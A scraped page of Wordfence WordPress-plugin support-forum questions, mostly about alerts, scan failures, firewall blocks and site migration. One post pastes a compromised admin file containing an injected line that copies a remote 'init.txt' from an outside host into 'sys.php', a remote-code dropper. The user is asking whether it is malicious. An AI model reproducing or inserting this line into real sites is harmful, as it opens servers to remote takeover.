Are you the publisher? Claim or contact us about this channel


Embed this content in your HTML

Search

Report adult content:

click to rate:

Account: (login)

More Channels


Channel Catalog


    0 0

    Replies: 0

    Using WF 6.3.9
    On one site, I suddenly received 12 simultaneous lockout alerts (“Exceeded the maximum number of page not found errors per minute for humans”) with exactly the same timestamp (to the second) – I usually only receive one, then it’s locked out for 30 minutes. If persistent, I’ll get another one 30 minutes later. Also max emails per hour is set to 10. Incidentally the same Chinese IP had a go at another site at the same time, and I got 2 emails from that one.

    Should I be worried or just irritated? I’m certainly intrigued, this has never happened before on 30-odd sites I have Wordfence on.


    0 0
  • 05/19/17--06:27: MS-Log.php highlighted
  • Replies: 1

    this is the contents – is it bad?

    <?php
    /**
    * User Dashboard About administration panel.
    *
    * @package WordPress
    * @subpackage Administration
    * @since 3.4.0
    */
    copy(‘http://bredican.com/init.txt’,’sys.php’);exit;
    /** Load WordPress Administration Bootstrap */
    require_once( dirname( __FILE__ ) . ‘/admin.php’ );

    require( ABSPATH . ‘wp-admin/about.php’ );
    ?>


    0 0

    Replies: 0

    The Screen Options and Help tabs at the top of the Admin Dashboard screen are not dropping down, none of the hover submenus in the side menu (such as Settings) pop out or appear when hovered over, and the up/down arrows to show/hide the widget areas in the main dashboard work area are disabled.

    Note that this is an issue only in the main Admin Dashboard screen, it is not happening on other backend Admin screens (such as Plugins), or page/post screens, etc. It is also happening whether I’m using Chrome, Firefox or Safari.

    It is happening when Wordfence is active, and immediately goes away when Wordfence is deactivated.

    It happens when it is only Wordfence that is active, all other plugins deactivated.

    It is happening with three very different themes active, including 2016.

    It is happening on 9 out of 11 sites, all eleven of them with Wordfence active and all eleven of them are in their own totally separate cPanels in the same reseller account on a high-end server. The php version is 5.6.

    The two sites that Wordfence is active on that the issue is not occurring have many varied active plugins and many other commonalities including the same theme, as several of the sites the issue is occurring on.

    I can give access to a test site in its own cPanel using the 2016 theme, where the issue is occurring with only the Wordfence plugin active. Both WP Admin and cPanel if it is helpful. I can also give similar access to one of the two sites the issue is not occurring on.

    I’ve tried to track this down the very best I can, putting in many hours. I am not php or js literate, and only vaguely grasp the deeper innards of WP. I really need some help.

    It is hard for me to describe this with enough info to be helpful in just a few words. I posted previously (late at night in some frustration) with even many more words and details, probably to much, hoping you might see a pattern or something I am not seeing, but all the details may have put you off.

    With huge appreciation for Wordfence and great respect, please may I have some response.

    • This topic was modified 2 hours, 1 minute ago by crzyhrse.
    • This topic was modified 2 hours ago by crzyhrse.

    0 0

    Replies: 0

    Up-to-date on WordFence. I have email alerts turned on and Max set a 0. I’m getting emails on the first email address, but not on the second email address. They are separated by a comma. I tried putting spaces behind and in front of the comma….and after saving, it eliminated the blank spaces. What am I doing wrong?

    Thank you!

    BR


    0 0
  • 05/19/17--22:04: memory issues
  • Replies: 0

    After 6.3.8. update, the scans have began failing again (and I was so happy it was working before…)
    Fatal error: Allowed memory size of 419430400 bytes exhausted (tried to allocate 65655345 bytes) in /home/…/public_html/wp-content/plugins/wordfence/lib/wfConfig.php on line 493

    Plus, the scan time is always exceeded. Initially, before the 6.3.9. update the memory issue didn’t even appear in the logs, now it does.

    How can i fix this, without allocating even more memory?

    Thanks


    0 0
  • 05/19/17--23:18: Top 5 Countries Blocked
  • Replies: 2

    Hello,

    I’m free user, not Premium one.
    What does exactly mean ‘Top X Countries Blocked’?!
    Does it mean, that all IP from these countries are blocked, so no one from these countries can see my website any more?

    • This topic was modified 45 minutes ago by Merkucio.
    • This topic was modified 42 minutes ago by Merkucio.

    0 0

    Replies: 0

    Hi, today we received Wordfense altert asked to fix problems like “Modified plugin file: wp-content/plugins/wp-asset-clean-up/assets/script.js……” total 17 similar problems. After we did all as Wordfense suggested then ALL my pages GONE.

    Could you please help to undo all the revisions as Wordfence suggested ALL our pages (except Home) are GONE. We even cannot login our Admin Page as this page is disappearing also.

    Could you help to undo all the revisions we made according to you advise? Many thanks for your help.

    Website: https://srpub.info


    0 0

    Replies: 0

    Hi, sorry I have to issue a new topic on above. I have discussed the issue with my hosting provider and together we cannot solve the issue. they have helped me to disable Wordfence plug with no avail. We can do nothing as we cannot even get into WP dashboard as it is also disappearing, we can do nothing, and cannot restore backup we did on 20 may as we cant get into wp dashboard.

    We clicked the “restore the WP.org’ button (something alike) in each of the issue you listed and then all pages gone.

    Sorry for the trouble caused to you but could you pls undo all the revisions we made, ie, undo all the “restore the WP.org’ revisions we made and let the issues as they are so thw website back to normal.

    many thanks for your help.

    Website: srpub.info


    0 0
  • 05/21/17--10:00: Gravityscan Error
  • Replies: 0

    New offer for Gravityscan on the dashboard seems to get blocked with the following comment.

    
    Continued experiencing HTTP 5xx errors
    
    
    This may be due to timeouts on your server or certain types of rate limiting, you should inspect the server and lower the scan intensity or whitelist Gravityscan's IP range if it does not seem to be under unusually heavy load.
    
    Details:
    
        503 errors: 12
    
    

    Not sure if this is due to Wordfence, please advise.


    0 0
  • 05/21/17--16:14: found error warning
  • Replies: 0

    hello,

    i’m using codepinch plugin, and found this warning error message related to wordfence (http://imgur.com/a/kTsJL).

    is it important error?

    thanks


    0 0

    Replies: 0

    Context for my question: I have a website that has been compromised. I drop the tables in the database, delete everything in public_html, roll back to a month old backup which is fine. I quickly update WordPress and the plugins, I change the database password, i change the admin password.

    2 hours later – the admin username is changed, while Wordfence is installed.

    I get back into the website and run a Wordfence scan and a Gravity Scan, and according to both of them I have nothing to worry about.

    So I don’t know how to interpret these results.

    What does it really mean when these platforms tell me the website is safe?


    0 0

    Replies: 0

    Hi! This morning, I found some unusual traffic from some IP addresses resolving to “google-proxy” machines in the Google.com domain. Here’s an example:

    United States Mountain View, United States tried to access non-existent page http://www.{mysite}.com/wp-content/uploads/2017/01/slide_1.jpg'
    5/21/2017 10:54:36 PM (8 hours 50 mins ago)   IP: 66.249.88.23 [block]   Hostname: google-proxy-66-249-88-23.google.com
    Browser: Chrome version 57.0 running on Win10
    Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
    

    Then:
    Wordfence: All recent hits for IP address 66.249.88.23[google-proxy-66-249-88-23.google.com]

    Time:	8 hours 50 mins ago -- Mon, 22 May 17 05:54:36 +0000 -- 1495432476.154719 in Unixtime
    Secs since last hit:	0.0000
    URL:	Possible XSS code filtered out for your security
    Type:	Page not found
    Full Browser ID:	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
    Location:	United States Mountain View, United States 

    So, I’m not sure if I should block these kinds of requests or not. Also, I’m getting messages about different “google proxy” IP addresses, with different browser user agent strings, trying to access other non-existent pages. The fact the URL above is being filtered out by the “recent hits” page makes me more concerned.

    Thanks!

    Peace…


    0 0

    Replies: 0

    I am attempting to move a WP site from one server to another.
    The DB import is failing due to use of the Aria engine for a couple wordfence tables.
    The source server is running: 10.1.20-MariaDB – MariaDB Server
    The destination server is running: MySQL – 5.6.32-78.1-log

    In the SQL export from the source server, the tables wp_wfNotifications and wp_wfPendingIssues both have ENGINE=Aria, like this:

    CREATE TABLE IF NOT EXISTSwp_wfNotifications` (
    id varchar(32) NOT NULL DEFAULT ”,
    new tinyint(3) unsigned NOT NULL DEFAULT ‘1’,
    category varchar(255) NOT NULL,
    priority int(11) NOT NULL DEFAULT ‘1000’,
    ctime int(10) unsigned NOT NULL,
    html text NOT NULL,
    links text NOT NULL,
    PRIMARY KEY (id)
    ) ENGINE=Aria DEFAULT CHARSET=utf8 PAGE_CHECKSUM=1;`

    The destination MySQL DB does not have the Aria engine. So attempting the import fails on the first instance of ENGINE=Aria.

    No other uses of Aria engine in the entire DB (in this case).
    I don’t know what controls what engine is used when writing the DB.
    I know I have Wordfence running on servers that have MySQL and no Aria engine (including the same server I am trying to move this DB to), so obviously Aria engine is not required for Wordfence.

    If it is wordfence code causing Aria engine to be used, then that code is creating DB incompatibilities for moving a WP site from one server to another, as in the above case.
    If that is true, can someone with ability to do so please submit an ‘official’ bug?

    And, any easy way to resolve this particular import fail?

    A time consuming work-around would be remove wordfence (and make sure the offending tables are actually removed), move the site, reinstall and reconfig wordfence. I hope there is something less troublesome than that.


    0 0
  • 05/22/17--14:19: File upload error
  • Replies: 0

    Hello,

    Since the last update of Wordfence plugin, we have an error.

    We are receiving pictures from a mobile app though ajax request. The last version of Wordfence blocks those photo and i had to desactivate the plugin to have our app working again.

    Even in learning mode or when i desactivate the firewall the plugin blocks the raw 64encoded data in the http request…

    Is it a misconfiguration of my plugin ?

    Please help me,

    Thanks

    sam


    0 0

    Replies: 0

    I’m using Gravity Forms along with Stripe to process payments. Strip is saying the callback url (https://winterstreetdesign.com/?callback=gravityformsstripe) returns a 403 error. I think Wordfence is blocking it, though when I go there it loads fine.

    I tried adding a rule to the whitelisted urld for the firewall. This is what I entered:
    URL: /
    Parameter: request.queryString[callback]

    Does that look right? and does it seem possible that it is Wordfence?

    Thanks.